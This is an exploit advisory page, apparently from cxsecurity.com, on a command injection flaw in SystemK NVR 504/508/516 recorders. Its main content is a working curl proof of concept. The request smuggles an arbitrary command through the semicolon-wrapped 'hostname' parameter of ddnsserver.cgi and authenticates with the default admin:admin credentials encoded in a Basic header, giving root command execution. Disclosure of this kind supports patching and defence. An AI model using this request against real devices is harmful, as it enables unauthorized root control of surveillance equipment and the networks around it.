SystemK NVR 504/508/516 Command Injection

2023.06.19
Credit: Keniver Wang
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: SystemK NVR 504/508/516 Command Injection # Exploit Author: Keniver Wang # Publish Date: 19/06/2023 # Date of found: 20/01/2021 # Vendor: SystemK # Vendor Homepage: https://nvr.bz/ # Version: NVR 504/508/516 2.3.5SK.30084998 # Greets: Weber Tsai (CHT Security) # Description A Command Injection vulnerability in the DDNS Setting that allows attacker to execute arbitrary commands with root privileges. # Proof of Concept curl 'http://<IP>/ddnsserver.cgi?action=test&address=members.dyndns.org&type=dyndns&username=&password=&hostname=;<COMMAND>;&updatetime=300' \ -X 'POST' \ -H 'Connection: keep-alive' \ -H 'Content-Length: 0' \ -H 'Authorization: Basic YWRtaW46YWRtaW4=' \ -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)' \ -H 'Accept: */*' \ -H 'Accept-Language: zh-TW,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6'


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top